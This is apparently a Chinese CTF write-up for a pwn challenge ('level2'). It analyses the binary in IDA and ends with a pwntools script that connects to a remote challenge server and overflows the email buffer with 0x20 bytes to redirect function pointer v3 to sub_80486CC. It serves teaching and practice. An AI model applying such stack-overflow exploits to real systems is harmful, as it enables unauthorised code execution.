1.题目
2.IDA分析
3.流程分析
流程:输入名字,邮箱,邮箱校验完,执行v3+--v14处的代码。v3原本指向sub_8048604的,我们发现sub_80486CC才是我们需要运行的函数。
思路:①为了避免v14影响结果,输入字符避免进入case判断。②通过输入邮箱进行栈溢出覆盖v3的内容,使它指向sub_80486CC。exp如下:
from pwn import *
#io = process('./level2')
io = remote('220.249.52.133', 54079)
payload = 'A' * 0x20 + p32(0x080486cc)
io.sendlineafter("What is your name?\n> ","yangns")
io.sendlineafter("Enter the string to be validate\n> ",payload)
io.interactive()
